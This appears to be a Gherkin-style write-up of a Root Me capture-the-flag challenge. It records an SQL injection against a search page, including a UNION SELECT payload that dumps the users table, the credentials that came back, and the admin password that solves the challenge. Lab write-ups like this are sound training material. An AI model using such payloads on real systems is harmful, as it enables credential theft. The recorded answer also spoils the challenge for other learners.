# Version 2.0
# language: en

Feature:  Web Server - Root Me
  Site:
     www.root-me.org
  Category:
    Web Server
  User:
    badwolf10
  Goal:
    Retrieve admin password using sql injection

  Background:
  Hacker's software
    | <Software name>    |       <Version>      |
    | Ubuntu             | 18.04 LTS (x64)      |
    | Mozilla Firefox    | 63.0                 |
    | Visual Studio Code | 1.29.1               |
  Machine information:
    Given I the challenge url
    """
    https://www.root-me.org/en/Challenges/Web-Server/SQL-injection-string
    """
    And The challenge statement
    """
    Retrieve the administrator password
    """
    Then I am redirected to the challenge website
    """
    http://challenge01.root-me.org/web-serveur/ch19/
    """

  Scenario: Fail: Inject testing query
    Given the challenge website
    Then I go to the search url
    """
    http://challenge01.root-me.org/web-serveur/ch19/?action=recherche
    """
    And I try searching the injection "%'"
    And I get the error
    """
    Warning: SQLite3::query(): Unable to prepare statement: 1,
    near "%": syntax error
    """
    And I realise the database engin is SQLite
    Then I try injecting "%' --"
    And I get five results of site information but not any user information

  Scenario: Success: Retrieve Users password
    Given the challenge website
    Then I go to the search url
    """
    http://challenge01.root-me.org/web-serveur/ch19/?action=recherche
    """
    And I try searching the injection
    """
    %' union select username, password from users --
    """
    And I get eight results five of site information and three users
    """
    admin (c4K04dtIaJsuWdi)
    user1 (OK4dSoYE)
    user2 (8Wbhkzmd)
    """
    And I validate the admin credential "c4K04dtIaJsuWdi"
    And I solve the challenge
